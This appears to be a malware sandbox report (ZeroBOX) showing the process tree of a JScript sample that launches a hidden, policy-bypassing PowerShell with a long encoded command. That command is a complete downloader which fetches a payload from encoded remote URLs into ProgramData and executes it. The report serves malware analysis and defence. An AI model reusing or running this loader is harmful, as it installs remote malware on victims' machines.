| ZeroBOX

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Fyhri.js

    3008
    • wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Fyhri.js" mostness BorderlandDownhearted Achromatise

      2208
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABmAGwAYQBtAGwAZQBzAHMAIAA9ACAANQA0ADkAOwAkAGcAYQBzAHQAZQByAG8AegBvAG8AaQBkAFYAaQBuAGQAaQBjAGEAdABvAHIAIAA9ACAAIgBBAG0AcAB1AHQAYQB0AGUAZABKAGUAZABjAG8AYwBrACIAOwAkAFQAZQBsAGUAcwBjAG8AcABpAGMAYQBsACAAPQAgACIAUAByAGUAbABhAHQAaQBjAGEAbABuAGUAcwBzAEMAYQBuAGMAZQBsACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABTAHQAcgBhAGkAdABzAG0AZQBuAFIAaABvAG0AYgBvAGgAZQBkAHIAYQBsACAAPQAgADIAMAA2ADsAJABNAG8AcwBrAGUAbgBlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AQQBBAHUAQQBEAEkAQQBOAFEAQQAxAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQB2AEEARwAwAEEAYQBRAEIAUwBBAEMAOABBAFkAdwBCAHEAQQBHAGsAQQBUAEEAQgBRAEEASABBAEEAUwBRAEIAVQBBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATABnAEEANQBBAEQARQBBAEwAdwBCAFkAQQBHADQAQQBaAEEAQQB2AEEARgBjAEEAYgB3AEIAdgBBAEUATQBBAGEAZwBCADEAQQBIAG8AQQBTAFEAQgBDAEEARQBRAEEAdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARQA4AEEAVABnAEIAUABBAEUAcwBBAGUAUQBCAHQAQQBIAGcAQQBiAHcAQgB2AEEARwA0AEEAUgBnAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABzAGwAdQBnAGwAaQBrAGUAIABpAG4AIAAkAE0AbwBzAGsAZQBuAGUAZQByACAALQBzAHAAbABpAHQAIAAiAHUAIgApACAAewAkAEQAaQBzAHMAZQB2AGUAcgBzACAAPQAgADYANgAwADsAdAByAHkAIAB7ACQAVwBhAGIAcgBvAG4AVwBvAG8AaQBuAGcAIAA9ACAAIgBNAGkAcwBsAGkAdgBlAGQARABpAHAAbABvAGsAYQByAHkAbwBuACIAOwAkAG8AdQB0AHQAaABvAHUAZwBoAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBaAEEAQgB5AEEARwA4AEEAYwB3AEIAegBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQQB1AEEASABBAEEAYQBBAEIANQBBAEgATQBBAGEAUQBCAHYAQQBBAD0APQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAVQBBAE0AdwBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQwA0AEEATQBnAEEAdwBBAEQAawBBAEwAZwBBADUAQQBEAFUAQQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEgATQBBAGQAQQBCAGwAQQBHADgAQQBjAEEAQgBzAEEARwBFAEEAYwB3AEIAMABBAEcAawBBAFoAUQBCAHoAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAbgB2AHIASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBhAEEAQgBsAEEARwBFAEEAWgBBAEIAbABBAEgASQBBAEwAZwBCAGkAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAQwBoAG8AbgBkAHIAbwBjAGwAYQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBjAEEAQgB2AEEARwB3AEEAZQBRAEIAegBBAEcAVQBBAGMAdwBBAHUAQQBHAE0AQQBhAFEAQgAwAEEASABrAEEAIgA7ACQAUABpAG8AbgBlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBsAHUAZwBsAGkAawBlACkAKQA7AGkAdwByACAAJABQAGkAbwBuAGUAZAAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHYAYQB0AGYAdQBsAFMAeQBzAHQAZQBtAGkAcwBlAHIALgB1AHAAZwBpAHIAZABzAEIAYQBjAGsAbABpAHMAdABzADsAJABmAGEAcwB0AHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE0AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAeABBAEMANABBAE4AUQBBADAAQQBBAD0APQAiADsAJABuAG8AbgB2AGEAYwB1AG8AdQBzAG4AZQBzAHMAVAB1AGMAdQBuAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBOAFEAQQB1AEEARABrAEEATQBBAEEAdQBBAEQARQBBAE8AQQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABnAEEAZAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBOAHcAQQA9AGQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFkAQQBaAFEAQgBzAEEARwA4AEEAZABRAEIAeQBBAEYAUQBBAGEAUQBCAG0AQQBHAFkAQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAdgBBAEEAPQA9ACIAOwAkAHQAdQByAHAAZQBuAHQAaQBuAGkAYwBBAG4AdABpAG0AbwBuAGEAcgBjAGgAYQBsACAAPQAgACIAQgByAGkAZABhAGwAZQByACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdgBhAHQAZgB1AGwAUwB5AHMAdABlAG0AaQBzAGUAcgAuAHUAcABnAGkAcgBkAHMAQgBhAGMAawBsAGkAcwB0AHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYANgA1ADIAMwApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAZABnAEIAaABBAEgAUQBBAFoAZwBCADEAQQBHAHcAQQBVAHcAQgA1AEEASABNAEEAZABBAEIAbABBAEcAMABBAGEAUQBCAHoAQQBHAFUAQQBjAGcAQQB1AEEASABVAEEAYwBBAEIAbgBBAEcAawBBAGMAZwBCAGsAQQBIAE0AQQBRAGcAQgBoAEEARwBNAEEAYQB3AEIAcwBBAEcAawBBAGMAdwBCADAAQQBIAE0AQQBMAEEAQgBFAEEARwB3AEEAYgBBAEIAUwBBAEcAVQBBAFoAdwBCAHAAQQBIAE0AQQBkAEEAQgBsAEEASABJAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBPAHcAQgBCAEEARwA0AEEAWgB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBBAD0APQAiADsAJABpAG0AcABlAHIAZgBvAHIAYQB0AGUAZABSAGUAcABlAG4AdABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBIAEUAQQBkAFEAQgBwAEEARwBjAEEAYwBnAEIAaABBAEcANABBAGQAUQBCAHMAQQBHAEUAQQBjAGcAQQB1AEEASABBAEEAYgB3AEIAcgBBAEcAVQBBAGMAZwBBAD0ATQBvAGUAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATgB3AEEAMABBAEMANABBAE0AUQBBAHkAQQBEAE0AQQBMAGcAQQB4AEEARABVAEEATQB3AEEAPQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGEAUQBCADAAQQBHAFUAQQBaAGcAQgBzAEEASABrAEEAYQBRAEIAdQBBAEcAYwBBAEwAZwBCAG4AQQBIAEkAQQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFkAUQBCAHcAQQBHAFUAQQBjAGcAQgBpAEEARwA4AEEAZQBRAEIAUQBBAEgASQBBAFoAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEASABRAEEAWQBRAEIAdQBBAEcAVQBBAGIAdwBCADEAQQBIAE0AQQBiAEEAQgA1AEEAQwA0AEEAWQB3AEIAcwBBAEcAOABBAGQAUQBCAGsAQQBBAD0APQAiADsAJABBAGQAcgBvAGkAdABlAHMAdAAgAD0AIAA0ADQAOwBiAHIAZQBhAGsAOwBBAG4AZwB1AGwAYQByADsAfQBBAG4AZwB1AGwAYQByADsAfQAgAGMAYQB0AGMAaAAgAHsAJABSAGUAdgBlAHIAdABlAHIAQgBhAG4AawBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABNAEEATABnAEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB6AEEAQwA0AEEATQBnAEEAMQBBAEQASQBBAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBBAEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAFEAQQAwAEEARABFAEEATABnAEEAeQBBAEQARQBBAE4AdwBBAD0AIgA7ACQAUwB0AHUAZABmAGkAcwBoAGUAcwBDAGUAcgBpAGEAbABpAGEAIAA9ACAAIgBwAHIAZQBwAG8AbgBkAGUAcgBhAHQAZQAiADsAfQB9ACQAYwBoAG8AbgBkAHIAZQBjAHQAbwBtAHkAIAA9ACAANwA0ADgAOwBBAG4AZwB1AGwAYQByADsA"

        2312

Process contents

No process loaded Click on a process in the tree above to load its data.